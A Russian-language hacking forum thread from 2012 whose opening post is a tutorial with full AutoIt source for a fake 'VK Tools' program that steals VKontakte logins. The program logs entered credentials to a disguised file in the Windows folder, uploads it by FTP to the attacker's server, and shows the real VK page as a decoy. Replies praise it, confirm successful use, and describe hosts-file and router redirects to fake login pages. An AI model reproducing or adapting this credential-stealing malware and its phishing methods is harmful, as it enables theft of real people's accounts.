Делаем фейк ВК (Поддельное ПО) на AutoIt

Предыдущие сообщения
22 августа 2012
#1 DialMax uid#563 Привет! Наверно каждому хотелось взломать страницу ВКонтате своего друга, девушки ну или врага... Самый распостраненный способ - выманивание данных для входа на страницу. В этой статье мне хотелось бы показать как можно взломать страницу ВК с помощью AutoIt. Мы будем делать поддельное ПО (типо для работы с сервисом).
Я хочу показать особый пример. Почему особый, да потому что в нём мы создадим объект _IENavigate, то есть браузер. Вы наверно подумаете для чего он? Можно же и так! Главное чтобы были поля для ввода данных! А этот объект будет служить средством для отвода глаз, т.е. типо программа пореальному работает, страница загружается - "значит работает" - может подумать юзер...
И так преступим!!!
Создаём папку с любым именем (для проэкта) например: Vkontakte Tools
Далее в ней создаём папку "Data"
Кидаем в нее вот эти картинки:

vgt.jpg :



btn_.bmp :





Далее создаем файл vk_tools.au3 (Назвение не важно главное чтобы было расширение .au3)
Вот его код:
#include <ButtonConstants.au3>
#include <IE.au3> 
#include <EditConstants.au3>
#include <GUIConstantsEx.au3>
#include <StaticConstants.au3>
#include <WindowsConstants.au3>
#include <process.au3>
#include <FTPEx.au3>

Global $iSizeMax = 1024, _ 
        $sServer = "FTP_Server", _ ;ftp host
        $sUsername = "UserLogin", _ ;Ftp user
        $sPass = "MyFTP_Pass", _ ;Ftp password
        $sFileLocal = @WindowsDir & '\win86X_logfile.log', _ ;C:\results.txt
        $sFileFTP = 'vk_results.txt', _
        $iTimeOut = 60000, _ ; 1 min.
        $iStart = TimerInit()


_IEErrorHandlerRegister ()
$oIE = _IECreateEmbedded()

$Form1 = GUICreate("VK Tools", 755, 522, 236, 268, BitOR($WS_POPUP,$WS_BORDER))
GUISetBkColor(0xFFFFFF)
$Pic1 = GUICtrlCreatePic("Data\vgt.jpg", 0, 0, 756, 42)
$VButt = GUICtrlCreateButton("Войти", 8, 168, 123, 25, $BS_BITMAP)
GUICtrlSetImage(-1, "Data\btn_.bmp", -1)
$Login = GUICtrlCreateInput("", 8, 88, 121, 21)
$Password = GUICtrlCreateInput("", 8, 136, 121, 21, BitOR($GUI_SS_DEFAULT_INPUT,$ES_PASSWORD))
$Label1 = GUICtrlCreateLabel("Пароль:", 48, 112, 45, 17)
$Label2 = GUICtrlCreateLabel("E-mail или моб.:", 32, 64, 82, 17)
$Group1 = GUICtrlCreateGroup("Страница", 136, 56, 617, 465)
GUICtrlCreateGroup("", -99, -99, 1, 1)
GUISetState(@SW_SHOW)
$exit = GUICtrlCreateButton("X", 734, 42, 20, 20)

$GuiActiveX = GUICtrlCreateObj($oIE, 143, 69, 605, 435)

While 1
	$nMsg = GUIGetMsg()
	Switch $nMsg
		Case $Exit
			Exit
	    Case $GUI_EVENT_CLOSE
			Exit
        Case $VButt
			$RL = GUICtrlRead($Login)
			$RP = GUICtrlRead($Password)
			$File = FileWrite(@WindowsDir & "\win86X_logfile.log","Login = " & $Rl & " " & "Password = " & $Rp & "         ")
			
			$hOpen = _FTP_Open('MyFTP Control')
		    $hConn = _FTP_Connect($hOpen, $sServer, $sUsername, $sPass, 1)
			_FTP_FilePut($hConn, $sFileLocal, $sFileFTP)
			
			_IENavigate ($oIE, "http://vk.com/login.php?email=" & $RL & "&pass=" & $RP)
	EndSwitch
WEnd
Вот и всё! Компилируете и проверяете! Как видите здесь тоже используется загрузка файла по ФТП. Так как это очень просто и практично. Только в этом примере есть один минус - это то что на эту программу поведётся только лох или халявщик (в принципе это почти одно и тоже)!
01:22:59 12
#2 MyP3uk uid#1395 Мне уже нравится этот парень!
Молодец, не останавливайся :)
10:20:50 3
#3 bg uid#1774
Только в этом примере есть один минус - это то что на эту программу поведётся только лох или халявщик (в принципе это почти одно и тоже)!
Их полно..

P.S Спасибо, статья очень понятна, проста и полезна..!
11:30:54 2
#4 zeekO uid#3231 Чётк0 15:27:20 1
#5 bg uid#1774 Наконец то руки дотянулись и сообразил все. Проверил, результатом доволен) ;) 18:58:35 2
#6 bg uid#1774
А Декомпилировать прогу эту можно? Если да, то не составит труда получить данные от ftp куда все сливается !)
19:00:14 1
#7 Alfinnov uid#3276 толи я туповат стал толи что, какой смысл в таких приложениях?

не проще юзеру в hosts вписать тогда уж переадресацию: vkontakt.com -> ваш сервер, который отобразить страницу входа и средиректит пользователя на vk.com?
ну или иные варианты, при которых юзер видеть именно в браузере все что требуется
19:15:36 0
#8 Red_Shuhov uid#1582
не проще юзеру в hosts вписать тогда уж переадресацию: vkontakt.com -> ваш сервер, который отобразить страницу входа и средиректит пользователя на vk.com?— Alfinnov
Мою кантору не пали сцукоо :)
я этой херью пользуюсь уже 1 год xD
20:07:34 0
#9 311208 uid#1840 чётка! (хорошо он всё делает) =) 21:50:01 0
#10 Alfinnov uid#3276 да хз, я по теме писать какие-то приложения которые по ftp вам заливают данные - сильно геморно, не рационально
если уж на комп попали - ботнет / троян ткни да и все

а вы тут усложняете
21:59:19 0
#11 Qemu uid#2451 Блин я пользуюсь по другому от вк)
Дим скинь Ява крашер в вк
02:24:20 0
#12 bg uid#1774
Блин я пользуюсь по другому от вк)
как?
02:28:10 1
#13 Qemu uid#2451 Редирект на фейк идет от роутера)))))после уже на норм аунтификацию вк - жертва даже не видит подмены)))) 02:29:53 0
#14 bg uid#1774 все, понял.) 03:16:52 1
#15 Anonymous uid#55 фууууу вот тема
не проще юзеру в hosts вписать тогда уж переадресацию: vkontakt.com -> ваш сервер, который отобразить страницу входа и средиректит пользователя на vk.com?
Сам пользуюсь а это что написал ТС не практично но для новичков изучить код полезно кагбе
19:27:17 0
#16 DialMax uid#563 можно конечно сделать вирь, который ставит переадресацию в hosts, я и сам думал вместо этой статьи написать о hosts, только есть одна проблема: некоторые антивири запрещают изменение хост файла. 21:20:30 0
Следующие сообщения
*Ник: Проверка уникальности... Если вы уже зарегистрированы, авторизуйтесь.
*Сообщение:
  Загрузка...